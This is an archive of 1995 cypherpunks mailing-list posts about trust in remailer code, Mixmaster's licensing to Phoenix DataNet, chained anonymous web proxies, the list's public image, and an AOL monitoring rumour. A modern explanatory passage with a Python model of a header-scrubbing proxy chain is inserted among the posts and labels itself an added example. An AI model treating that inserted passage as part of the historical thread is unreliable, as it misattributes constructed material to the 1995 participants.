People don't use Julf's source code. People use the services provided by Julf's remailer, which runs Julf's source. Trusting anon.penet is relatively simple (conceptually) because the author, distributor, and user of the remailer code (where user = remailer operator) are all the same person. I would be less likely to trust Julf if I thought he was running software he received (through unknown distribution channels, from an unknown author) as an executable without source. I trust Julf because (a) he seems to be a decent/trustworthy person, and (b) because I think he has enough information available to him to be sure that his system doesn't have intentional back doors nor glaring unintentional ones. If only one of (a) and (b) were true, I'd trust anon.penet.fi a lot less.

I've seen messages from people who refuse to use ViaCrypt PGP because they can't see the source. I own a copy because I don't want to worry about licensing when I use it in a commercial context and because I don't think Phil would have been associated with it if the binaries distributed weren't free of known weaknesses different from those documented with the freeware PGP or otherwise disclosed. My inclination is to feel the same way about distributions of Mixmaster. If Lance is willing to sign the code which is shipped, my hunch is that there's nothing tricky going on.
If Lance disappears, and the purchaser turns out to be unknown, I dunno if I'd run it before someone trusted had disassembled it (or someone liberated the source code) and it was inspected and found to be clean.

[I think it's useful to continue beating the almost-dead horse of the marketing of Mixmaster because I suspect that the anonymous purchaser of Mixmaster subscribes to the list, and is thereby aware of what potential remailer operators and remailer users are going to like, and not like.]

> Why pay for remailers when there are free ones? Speed and
> lawyers pop right up as damn good answers. Putting up a couple of
> p120s on a T1 in the Caribbean isn't cheap, nor is making sure you
> have a good lawyer who'll protect the machines when the bad guys show
> up with warrants. I'd be much happier to use a fast system on good
> legal ground than a freebie.

It's safer still to use a system which doesn't keep logs and has otherwise taken steps to minimize inadvertent data leakage. (Imagine me mentioning here all of the by now tiresome ideas about thermite, degaussers, low-level-formats of the HD, etc, etc. Please, please, let's not start that thread again for at least 6 months.)

I'm not sure that there are any special lawyer tricks to stop the execution of a search/seizure warrant. An attorney may help you keep items found out of court later. I suppose it'd be possible, if the cops were cooperative and the attorney immediately available and the magistrate/judge who signed the warrant was immediately available to try to stop the execution of the warrant, but that seems pretty far-fetched. I've been reading a lot of search & seizure cases lately for work and haven't seen anything like this mentioned, ever. If anyone's got a cite for "how to stop a warrant search & seizure in progress", please pass it along. I'm sure my boss (and his clients) would be interested.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFuuJn3YhjZY3fMNAQGsRAP+PIm6ZsjfCFetFr0//LPUuBg+tiK9b8Dh
4WXji1ab6kCfB+SCbNhU7IDNCR7pK7c1rWjVL+r0gbded46Um6+mn5hDKagKhztD
nqld1vTETJFX9TmsRe3mXBE/TW1pqysoiS3PnM4mZ8b0GjErOdSbNpxOizvBOdhi
jLoNKnEGnpA=
=3dgI
-----END PGP SIGNATURE-----

From aleph1 at dfw.net Sat Sep 16 22:39:10 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sat, 16 Sep 95 22:39:10 PDT
Subject: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID:

What's the problem of using CERN in proxy mode? You can even set it up to do chaining.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

On Sun, 17 Sep 1995, Laurent Demailly wrote:
> + If this has not been done before and is available ? (and where)

From loki at obscura.com Sun Sep 17 00:55:18 1995
From: loki at obscura.com (Lance Cottrell)
Date: Sun, 17 Sep 95 00:55:18 PDT
Subject: Mixmaster Licensing Offer Explained
Message-ID: <199509170754.AAA23527@obscura.com>

-----BEGIN PGP SIGNED MESSAGE-----

From: Lance Cottrell
Date: 17 September 1995
Subject: Mixmaster Licensing Offer Explained

Permission is granted to distribute this document in any media for any purpose as long as the entire document is distributed with the attached digital signature intact, or the document is clearly marked as having been modified with the locations of deleted text indicated.

Several rumors have surfaced following my announcement of Mixmaster's changing status. I want to nip these worries in the bud. After discussion with the party interested in commercially licensing Mixmaster we have decided to explain the whole situation publicly.

The company offering to license Mixmaster is Phoenix DataNet, a Houston area ISP. John Perry, a person well known to this list and the remailer community in general, is a Senior Systems Administrator at Phoenix.

On Thursday I received a call from John.
Some others at Phoenix had just noticed a Mixmaster remailer he had been running on one of their machines. Phoenix has several large corporate customers who need secure transactions for some special applications. The core engine of Mixmaster is well suited to that purpose. They offered to license the code from me to use as the framework on which to build these other programs. In the process they will rewrite many basic functions in Mixmaster that need major overhaul (e.g., key management). We will incorporate those improvements back into Mixmaster. This should lead to porting Mixmaster to several other platforms, and to fixing most of my worst coding atrocities.

I had never considered licensing Mixmaster, but I know John Perry both personally and by reputation. He has thoroughly assuaged my fears that Phoenix would try to weaken or restrict Mixmaster in any way. John will be leading this project on the Phoenix end.

He asked that I delay the release of the next version of Mixmaster pending clarification of everyone's intentions. Now that we have reached an understanding the planned release of Mixmaster version 2.0.2 will take place as soon as I can get it ready.

There are no plans to sell Mixmaster clients or servers. They will continue to be released free with source code. I will still control the contents of all releases of Mixmaster.

All future versions of Mixmaster will be backward compatible. There will be no "Legal Kludges" preventing old clients from working with new remailers, and new clients will be able to generate old message formats. Currently there are no plans to change the message format at all.
-Lance Cottrell

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFvVivPzr81BVjMVAQHzhgf/f9zM91/N0S/JljicjDpoGzQ6Pt4gZVy9
ar407vp6js7EJ7Kg2XHtni6FwowM066rbGrt8W/8ZoQJGBxgKkfSvhLpEL7E926M
tn5QDEysVa1itzkvym2rQuNRIALfLOwzcYyLMdfjBtPMhRJkfwDthrrl9ocHkrSR
WW1wPwBRj/t+LFl6ueXwN8ZYLJVmbIoLy7BcqbNzLWjqmB7jgN2toxVCRfM7qfkE
DX1M/+hPddE6dT8ZgWdSt9dUvMQ7hu8BfHKCkcf0XWKmmeJ8jh+XDISvC7EFgIGT
H5XjkLpA2Eg+qmYzKHDOQaQT9SfzSVs4Y9sTzMlbewBi3jna6Dz/Sw==
=G2pZ
-----END PGP SIGNATURE-----

--
Lance Cottrell  loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche

From dl at hplyot.obspm.fr Sun Sep 17 03:11:09 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sun, 17 Sep 95 03:11:09 PDT
Subject: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <9509171010.AA11011@hplyot.obspm.fr>

Aleph One writes:
> What's the problem of using CERN in proxy mode? You can even set it up to do
> chaining.

The chaining is not dynamic (but it is maybe patchable)? I don't think there is support for encryption (ssl patches maybe?)? Also, CERN httpd is a huge thing, maybe some smaller proxy would do... My development is/could be based on my httpd, but simplified... I'll have a look at standalone already existing proxies before reinventing the wheel...

Regards
dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...
Freedom Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven

From dl at hplyot.obspm.fr Sun Sep 17 03:17:15 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sun, 17 Sep 95 03:17:15 PDT
Subject: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <9509171016.AA11022@hplyot.obspm.fr>

Christian Wettergren writes:
> | + Chaining would be an imo good idea (ie cli <-> anonproxy1 <->
> | anonproxy2 <-> ... <-> server) but how would you manage to tell
> | your favorite web browser to add in its header something like
> | Http-Proxy-List: anonproxy2, ...
> | An alternative would be to have a database of available (running)
> | proxies and that the proxy itself randomly choose a next route ?
> Don't most of the browsers support a "firewall-proxy-mode", where
> all queries are sent off to a special daemon, that forwards the query
> on. This would probably be the place to add the header-munging.

yes, they support one level of proxying, but not several as far as I know (so chaining must be done by the proxy itself as I suggested below)

> How do you plan to get the reverse-path working? Having an
> encrypted/chained return path in the request?

Reverse path is not a problem because WWW works with a bidirectional connection, so you get the answer to your query on the same path as you send it (it's client <-> proxy1 ... (<-> and not ->))

Regards
dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...
Freedom Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven

From aba at dcs.exeter.ac.uk Sun Sep 17 05:37:01 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Sun, 17 Sep 95 05:37:01 PDT
Subject: CYPHERPUNK considered harmful
In-Reply-To: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org>
Message-ID: <18742.9509171235@exe.dcs.exeter.ac.uk>

Roy Silvernail writes:
> In list.cypherpunks, aba at dcs.exeter.ac.uk writes:
> > One thing I have been thinking would be nice would be a USENET
> > newsgroup, as mailing lists are a step away from easy access which
> > some people never make.
>
> That's a feature, not a bug. Unless the group was moderated, I predict
> the S/N ratio to be <= 0. Witness the crap in alt.2600.

I think you misunderstand what I was saying, I wasn't saying *instead of*, but *as well as*, and with a different purpose, just a comment on Peter's post as to creating *another* group / list with a different purpose, one to specifically further his ideas on transferring technology to more people.

> The mailing list, as someone said before me, works as a limited
> pre-screening system. Given the nature of the list's focus and
> discussion, I think a newsgroup would end up being a stable
> attractor for the clue-deficit crowd. Not something I'd find
> useful.

So I most definitely agree with the likely effects of for instance merging the list and a newsgroup with a mail to news gateway, as someone suggested, this would be a really bad idea, and would open the list to a flood of junk. If a group such as say alt.cypherpunks were created, it would be just yet another group which hosts endless directionless arguments with David Sternlight, etc. via huge cross posting. Perhaps it would be better to just post crypto FAQs to existing crypto groups, to further use of crypto.

A later suggestion someone else had was of a read-only mailing list mirror in a newsgroup.
I'm not sure about this, I mean yes it would allow more people to casually read, and this is what I use Todd Masco's nntp.hks.net nntp server for, and find it a really nice way to read, much nicer than a mail box, even if it was slower for me. Of course there are software solutions which allow you to set up similar effects yourself, but as a standard read-only newsgroup, I think it would likely increase readership. But I'm not sure, I mean even that is likely to get the list some more junk, as it will be less of a barrier to post, I mean all you have to do is send to cypherpunks at toad.com, after all, and it wouldn't take a lot to figure that out.

Undecided as to whether a read only newsgroup in mail.cypherpunks or something would be a good idea or not. I'm sure it already happens a lot of places, so perhaps it won't make a lot of difference. But I definitely wasn't advocating gating an alt group to cpunks and vice-versa.

Adam

From banisar at epic.org Sun Sep 17 07:21:57 1995
From: banisar at epic.org (Dave Banisar)
Date: Sun, 17 Sep 95 07:21:57 PDT
Subject: [ASSENT NOISE] Re: C-punks, marketing for the masses
Message-ID:

>
>The Cypherpunks group is not like that. Lacking any formalized leadership,
>and--most importantly--lacking offices in D.C., we can't be asked to
>perform like the usual trained seals who produce the soundbites that fit
>into the stories too many reporters want. Again, a weakness and a strength.

Hey! Bark Bark Bark Bark

Dave (partially trained seal protesting that description)

PS Sorry all for my last message that should have only gone to Bruce. I'm claiming jetlag.
David Banisar (Banisar at epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center   * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     * ftp/gopher/wais cpsr.org
Washington, DC 20003                    * HTTP://epic.digicash.com/epic

From sunder at amanda.dorsai.org Sun Sep 17 08:16:36 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Sun, 17 Sep 95 08:16:36 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509170429.AA05221@zorch.w3.org>
Message-ID:

On Sun, 17 Sep 1995 hallam at w3.org wrote:

> I like having privacy, part of the cost of that privacy is respecting the
> privacy of others.

And that's where we, the cypherpunks come in, by advocating strong cryptographic protocols and tools, we can keep every machine safe from intrusion; it's not just Uncle Sam's evil minions that should have total privacy; normal citizens need privacy too - the spooks shouldn't be the only ones with it. :-)

This message has been brought to you by the Cypherpunks. Use only Cypherpunks brand software ;-D

==========================================================================
 + ^ + |  Ray Arachelian    | Amerika: The land of the Freeh.  | _     |>
  \|/  |sunder at dorsai.org| Where day by day, yet another     | \ |
<--+-->|                    | Constitutional right vanishes.   |  \|  /|\
  /|\  | Just Say           |                                  |   <|\
 + v + | "No" to the NSA!   | Jail the censor, not the author! |   <| n
==========================================================================

From sunder at amanda.dorsai.org Sun Sep 17 08:45:57 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Sun, 17 Sep 95 08:45:57 PDT
Subject: AOL monitoring
In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com>
Message-ID:

This sounds fishy to me. Why would AOL need to download the databases of files you've downloaded to your hard drive? I'm 99.9999% sure that they would keep their own logs about just what you do online. They wouldn't have to steal a copy of the log from your hard drive to find this out...
A further hint as to why this won't work: the client software doesn't keep track of which messages you've read in a discussion area, AOL's servers do. How do I know this? Because I use AOL on a Mac from home, and from Windows at work. Completely separate installations, yet AOL remembers which messages are New or rather unread to me regardless of which of the clients I use. So if they keep that info on their side, they sure as hell wouldn't keep the logs of the files you've downloaded on yours.

Making the download database read only is a silly measure, not likely to do anything for you. If you want to protect what is on your system, it's easy. Encrypt your whole hard drive except for about 20Mb or so, and don't mount the encrypted portion when going on AOL. Leave a copy of Windows with nothing but AOL in it outside, and use that copy. If their software tries to access another drive, they don't get a clue as to what you have or don't -- other than DOS and Windows and their client. :-)

There are probably a dozen more ways of doing this.... i.e. booting off a SyQuest or M.O. cartridge, using another computer to download files, using another PC which has nothing on it, using these in combination with using another account - not just another screen name, etc. Bad thing is that this will mean a lot of extra work on your part...

But from the sounds of this, the precautions offered here are just another net.legend in the making... If I were AOL, I would have written their side of the software to track the files, not the client side.

Further, if I wanted to (I'm not AOL, nor do I want to do the following, nor do I have any knowledge of how AOL's clients were written...) if I wanted to check out your hard drive, I would include directory searching routines in the client, as well as a way to transfer info back on any file or the file itself to AOL.
However this would be obvious to any smart user as they would see their external modem's XMIT LED light up like Christmas in a very suspicious way. There is no way to know if such code exists in the AOL client, however, if there is, as unlikely as the possibility is, you still can hide your files from such possible privacy invasion techniques.

==========================================================================
 + ^ + |  Ray Arachelian    | Amerika: The land of the Freeh.  | _     |>
  \|/  |sunder at dorsai.org| Where day by day, yet another     | \ |
<--+-->|                    | Constitutional right vanishes.   |  \|  /|\
  /|\  | Just Say           |                                  |   <|\
 + v + | "No" to the NSA!   | Jail the censor, not the author! |   <| n
==========================================================================

From aleph1 at dfw.net Sun Sep 17 09:27:08 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sun, 17 Sep 95 09:27:08 PDT
Subject: Anonymous WWW proxies
In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr>
Message-ID:

Points taken. But I believe there are (or will be patches) for CERN to do SSL. Check the SSLeay ssl-user mailing list.

While we're talking about anonymous proxies. I always wanted to set up an IP anonymous proxy using Linux IP tunnel and maybe also IP Masquerading. This would allow people to have anonymous Web Servers, etc. (But as anything it would probably be abused for hacking, etc at no end). Any comments?

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

On Sun, 17 Sep 1995, Laurent Demailly wrote:
> The chaining is not dynamic (but it is maybe patchable)?
> I don't think there is support for encryption (ssl patches maybe?)?
> Also, CERN httpd is a huge thing, maybe some smaller proxy would
> do...
> My development is/could be based on my httpd, but simplified... I'll
> have a look at standalone already existing proxies before reinventing
> the wheel...
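The anonymous-proxy thread above settles on three design points: the browser only knows how to talk to one proxy, so each proxy must pick the next hop itself (Laurent); the proxy is the place to do the "header-munging" (Christian); and no separate return path is needed because the reply comes back over the same bidirectional connection (Laurent). The following is an added example, not code from the thread or from CERN httpd, TIS http-gw or any other proxy named here: a small in-process model of such a chain. Every address (`client.example`, `proxy1.example`, `www.example`), the request, and the list of headers treated as identifying are constructed assumptions; real proxies would speak over TCP sockets, which the function-call chain stands in for.

```python
"""Model of a chained anonymizing HTTP proxy (constructed example)."""
import random
from dataclasses import dataclass, field

# Headers that identify the client or record the path taken. A privacy
# proxy drops them before forwarding. This list is an assumption: the
# thread speaks of "header-munging" but names no particular headers.
IDENTIFYING_HEADERS = frozenset({
    "user-agent", "referer", "cookie", "from", "via",
    "x-forwarded-for", "proxy-connection", "authorization",
})


def parse_request(raw: bytes):
    """Split a raw HTTP/1.0 request into (request line, header pairs, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def build_request(request_line: str, headers, body: bytes) -> bytes:
    """Reassemble a request from its parts."""
    head = "\r\n".join([request_line] + [f"{n}: {v}" for n, v in headers])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def scrub_headers(headers):
    """Drop identifying headers; keep what the origin needs (Host, Accept, ...)."""
    return [(n, v) for n, v in headers if n.lower() not in IDENTIFYING_HEADERS]


@dataclass
class OriginServer:
    """Stand-in for the web server at the far end of the chain."""
    seen_from: str = ""
    seen_headers: list = field(default_factory=list)

    def serve(self, from_addr: str, raw: bytes) -> bytes:
        _, headers, _ = parse_request(raw)
        self.seen_from = from_addr       # all the origin learns: the last hop
        self.seen_headers = headers
        return b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok"


@dataclass
class AnonProxy:
    """One hop. It learns only who connected to it and the scrubbed request."""
    addr: str
    origin: OriginServer
    rng: random.Random
    peers: list = field(default_factory=list)      # proxies it may forward to
    seen_from: list = field(default_factory=list)  # who connected to this hop

    def handle(self, from_addr: str, raw: bytes, hops_left: int) -> bytes:
        self.seen_from.append(from_addr)
        request_line, headers, body = parse_request(raw)
        clean = build_request(request_line, scrub_headers(headers), body)
        # The reply returns up this same call chain, the way an HTTP reply
        # travels back over the same TCP connection: no return path has to
        # be encoded into the request.
        if hops_left > 0:
            # The proxy, not the browser, picks the next hop at random
            # (browsers only know how to talk to a single proxy).
            nxt = self.rng.choice([p for p in self.peers if p is not self])
            return nxt.handle(self.addr, clean, hops_left - 1)
        return self.origin.serve(self.addr, clean)


def run_chain(hops: int = 3, seed: int = 7):
    """Send one constructed request through `hops` proxies to the origin.

    Returns (response, origin, proxies) so the caller can inspect what each
    party saw.
    """
    rng = random.Random(seed)
    origin = OriginServer()
    proxies = [AnonProxy(f"proxy{i}.example", origin, rng) for i in range(1, 5)]
    for p in proxies:
        p.peers = proxies
    # Constructed client request carrying the usual identifying headers.
    request = (b"GET http://www.example/ HTTP/1.0\r\n"
               b"Host: www.example\r\n"
               b"User-Agent: Mosaic/2.6\r\n"
               b"Referer: http://private.example/secret\r\n"
               b"Cookie: session=abc123\r\n"
               b"Accept: text/html\r\n\r\n")
    response = proxies[0].handle("client.example", request, hops - 1)
    return response, origin, proxies


if __name__ == "__main__":
    resp, origin, proxies = run_chain()
    print("origin saw request from:", origin.seen_from)
    print("origin saw headers:", origin.seen_headers)
    print("entry proxy saw:", proxies[0].seen_from)
    print("response to client:", resp)
```

Running it shows the origin receiving the request from one of the proxy addresses with only Host and Accept left, while only the entry proxy ever sees `client.example`. What the model deliberately leaves out is what the thread also flagged: without encryption between hops, anyone watching the wire at a proxy still sees the request in the clear, and a hop that keeps logs of `seen_from` is exactly the kind of record the later remailer discussion warns against.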
From tcmay at got.net Sun Sep 17 09:46:11 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 17 Sep 95 09:46:11 PDT
Subject: Trained Seals and Beltway Insiders
Message-ID:

At 2:23 PM 9/17/95, Dave Banisar wrote:
>>
>>The Cypherpunks group is not like that. Lacking any formalized leadership,
>>and--most importantly--lacking offices in D.C., we can't be asked to
>>perform like the usual trained seals who produce the soundbites that fit
>>into the stories too many reporters want. Again, a weakness and a strength.
>
>Hey! Bark Bark Bark Bark
>
>Dave (partially trained seal protesting that description)

Well, sorry for letting my rhetorical excesses come to the fore!

On even days I think the work of the Washington lobbying/policy groups is very useful, even if not always done the way I would do it. (Having grown up just outside D.C., nothing would ever get me to live in that area again, though.)

On odd days, I think of them as "Beltway insiders," with the same handful of "spokeswonks" handling all of the issues, dealing with all of the press conferences, attending the various D.C. events, and essentially being part of the System.

I never did memorize what all those "estates" are, as in the Third and Fourth Estates. But I think the Washington crowd has several components: The Gubment (itself divided into several branches), the Press, the Contractors, and the Lobbyists. The "think tanks" which ring D.C. and other areas (Brookings, Cato, the new Progress and Freedom Foundation, the military advisory think tanks, and a dozen or more others) are an industry unto themselves. Add to these the various lobbying groups (NRA, AMA, tobacco, Right to Life, etc.). And throw in various national groups with D.C. offices. Quite a stew.

They all play off each other, with the lobbying groups trained to "give good sound" to the reporters who want some quotable line about child porn, or Clipper, or whatever.

Any conclusions for us? Maybe, but I won't touch them here.
--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From perry at piermont.com Sun Sep 17 09:58:34 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 17 Sep 95 09:58:34 PDT
Subject: Commercial Mixmaster
In-Reply-To: <199509170348.XAA06314@bwh.harvard.edu>
Message-ID: <199509171656.MAA27949@frankenstein.piermont.com>

Adam Shostack writes:
> It's worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK). People use it because they trust Julf, or
> trust people who trust Julf.

Yeah, but remember -- there is very little that Julf's code could do to "cheat". Julf's system maintains a mapping of users to aliases anyway, so he has no need to "pervert" the system -- he can do all the bad things we worry about with it working correctly. We therefore need not see the code to trust the system, because the only way that the system is trustworthy is if Julf is trustworthy. Other systems based on cryptography might not be in this position.

Perry

From Andrew.V.Kovalev at jet.msk.su Sun Sep 17 10:06:38 1995
From: Andrew.V.Kovalev at jet.msk.su (Andrew V. Kovalev)
Date: Sun, 17 Sep 95 10:06:38 PDT
Subject: Anonymous WWW proxies
In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Laurent Demailly wrote:
>
> Aleph One writes:
> > What's the problem of using CERN in proxy mode? You can even set it up to do
> > chaining.
> The chaining is not dynamic (but it is maybe patchable)?
> I don't think there is support for encryption (ssl patches maybe?)?
> Also, CERN httpd is a huge thing, maybe some smaller proxy would
> do...
> My development is/could be based on my httpd, but simplified... I'll
> have a look at standalone already existing proxies before reinventing
> the wheel...
>

I am almost sure that new TIS http-gw will do. Especially if ssl will be added by some kind soul..

avk
- --
- --- \/\/\/ Andrew.V.Kovalev at jet.msk.su +7-095-973-4848 office
Security is like defecation - unpleasant, but alternatives are worse.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQBFAwUBMFxVZvLk60Co0vEHAQHYTQF+OWKil3l+o1gGQNw4jpWseQL80Fi9YwRc
ydyRvfkmnFn+5hhpQXLVSlS+WwyWNt1G
=TYGa
-----END PGP SIGNATURE-----

From dcl at panix.com Sun Sep 17 10:16:06 1995
From: dcl at panix.com (David C. Lambert)
Date: Sun, 17 Sep 95 10:16:06 PDT
Subject: CYPHERPUNK considered harmful
Message-ID: <199509171657.MAA26446@panix.com>

-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
> On Fri, 15 Sep 1995, David C. Lambert wrote:
>
> > BTW, I'm not for changing the name of the list, but I do see the logic
> > in a more establishment-friendly name to use when lobbying the public.
>
> Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which
> hide their true (Ohhh! Scary!) potential in an effort to make them commonly
> acceptable to joe sixpack.

I believe you misstate the point that people are trying to make. I haven't seen anyone advocating the "watering down" of any so-called "teachings" to "hide" any "true potential". The only thing that people have mentioned is that some of the less clueful out there have a knee jerk response to the name "cypherpunk". That's all.

> Can't we all see what road this leads down?

No. Please enlighten us.

> At the risk of politicizing the issue, I wouldn't be the first to call this
> "left-speak" or "term-sanitizing."

And this matters because...?
> Really the core issue is that the citizens of their respective nations
> need to either:
>
> 1> See cryptography for the important individual rights issue that it
> is and latch on to the basic desire for free and unmonitored commerce and
> exchange without censorship or observation.
>
> or
>
> 2> Decide that they are not interested in the issues because these
> issues are too radical, or simply because their own political ideas
> fall left (or statist) of this spectrum.

What exactly is it that you feel "the citizens of their respective nations" are doing right now, if not this?

> in the end I
> don't care if every joe sixpack on the planet uses real crypto, just so
> long as those I am to conduct commerce (of data or goods) with do.

If this is the case, then I'm at a loss to understand how you fail to see the merit in a "term-sanitizing", as you put it, in order to make the use of strong crypto desired and required by Joe Sixpack. How do you expect the legality of strong crypto to survive unless Joe and his friends exert political pressure to keep it alive? Isn't it obvious that unless this happens, that strong (unescrowed) crypto is on the path to being outlawed (at least in the US, and several other countries)?

> The final judgement will be in the advantage of velocity and security of
> transactions and the wealth that this "allocates" to those wise enough to
> adopt crypto exchange systems. Evolution in action. If this makes me
> elitist, so be it.

Elitist or not, this is beside the point. People are bringing up political and rhetorical concerns because they feel that political and persuasive methods are required *right now* in order to preserve the *legality* of strong crypto. I only care about whether Joe Sixpack wants strong crypto because if I can't persuade him that he does, he won't help me keep it legal in my country of residence. Once its legality seems safe(r) from attack, he can go on using rot13 for all I care.

David C. Lambert
dcl at panix.com (finger for PGP public key)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFxSiapplsfgM88VAQGj5wQAoY2FQe0rh0InWF1xOmST91QDCy4TrYUj
Y6Vnu/i3yspS/vDsKLMbIYAezAJEtgOPHEOf7Rv1Y4gKDyZNAJbYESXiYTQXD7O3
SNWNtb9nAT6l1RPqsnFR9yWAWYQ1CS3dLRpNpMBIqzL/HnKyKrgitLKQ530XtF8O
78u6jtmsBa4=
=Jgoe
-----END PGP SIGNATURE-----

From jlasser at rwd.goucher.edu Sun Sep 17 10:33:38 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Sun, 17 Sep 95 10:33:38 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To:
Message-ID:

On Sat, 16 Sep 1995, Steven Levy wrote:
>
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity."
>
> It may not be a crime, but it's not nice to steal a title.
>

Well, it IS kinda a common word these days. The Beatles and Madonna both have a song called "Rain" -- this doesn't mean Madonna stole it, does it?

Jon
------------------------------------------------------------------------------
Jon Lasser (410)494-3072     Visit my home page at http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From tcmay at got.net Sun Sep 17 12:25:41 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 17 Sep 95 12:25:41 PDT
Subject: Mixmaster Licensing Offer Explained
Message-ID:

(I've trimmed the mailing lists I'm not on...)

At 8:01 AM 9/17/95, Lance Cottrell wrote:
> Permission is granted to distribute this document in any media for any
>purpose as long as the entire document is distributed with the attached
>digital signature intact, or the document is clearly marked as having been
>modified with the locations of deleted text indicated.

So sue me. :-}

(That is, I'll treat this article in the normal way, trimming sections I'm not responding to and making note of elisions only where I think it important to.)

...
>The company offering to license Mixmaster is Phoenix DataNet, a Houston
>area ISP. John Perry, a person well known to this list and the remailer
>community in general, is a Senior Systems Administrator at Phoenix.
>
>On Thursday I received a call from John. Some others at Phoenix had just
>noticed a Mixmaster remailer he had been running on one of their machines.
>Phoenix has several large corporate customers who need secure transactions
>for some special applications. The core engine of Mixmaster is well suited
>to that purpose. They offered to license the code from me to use as the
>framework on which to build these other programs. In the process they will
>rewrite many basic functions in Mixmaster that need major overhaul (e.g.,
>key management). We will incorporate those improvements back into
>Mixmaster. This should lead to porting Mixmaster to several other
>platforms, and to fixing most of my worst coding atrocities.

First, I think it generally a Good Thing that remailer software gets commercialized and cleaned-up, or that at least commercial packages exist. (I'm not going to get into commercial vs. non-commercial and Microsoft vs. Gnu issues.) If Lance makes a bunch of money off this, more power to him.

However, this commercialization raises some interesting issues. Others have dealt with various concerns about the code integrity, about features added, and even about TLA access. I'll address some liability and legal issues.

* Will Phoenix DataNet be making the mix software available for purchase, or are they funding _internal development_? (That is, mixes for their corporate clients, which raises some interesting issues in and of itself, as discussed below.)

* If Phoenix is planning to resell Mixmaster, or whatever they call it (as "Mixmaster" may remain a trademark of the appliance company which originated the name), what will be their liability for the various abuses which are likely to occur? None of the existing remailers/mixes has had "corporate" backing, and the "deep pockets" corporations are often presumed to have, so lawsuits have not gone after corporations.

* On the other hand, if Phoenix is primarily aiming at internal use, for specified corporate customers, how will they stop others from using the service? If chaining is used, and absent any special "untraceable postage tokens" they might issue (as one way to control access), how will the Nth mix in a chain of M mixes "know" whether an incoming message can be remailed or not? (Schemes to sign the packets obviously flunk the anonymity test.)

There are many other interesting issues which crop up when Giant Corporation begins to deploy and use remailers. What if, for example, the Justice Department claims that Phoenix and its customers are using remailers for price fixing and collusion? (Just to be clear on this, I personally have no problems with such collusion....but the Antitrust people see things differently.)

(To be sure, telephones can and of course have been used to collude. Partly, wiretaps help here (until voice encryption happens...). But Justice has gone after airline reservation computer systems which they believe were used to "signal" price information. Imagine how overjoyed they'll be to see Phoenix DataNet deploy their system!)

Again, don't confuse my arguing points here with any kind of advocacy of the Justice Department/Antitrust Division position. I'm only trying to think out what some of the legal issues will be that face the first U.S.-domiciled company to actually start selling remailers or to set up a remailer network for customers.

Interesting times ahead.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From aba at dcs.exeter.ac.uk Sun Sep 17 12:28:43 1995
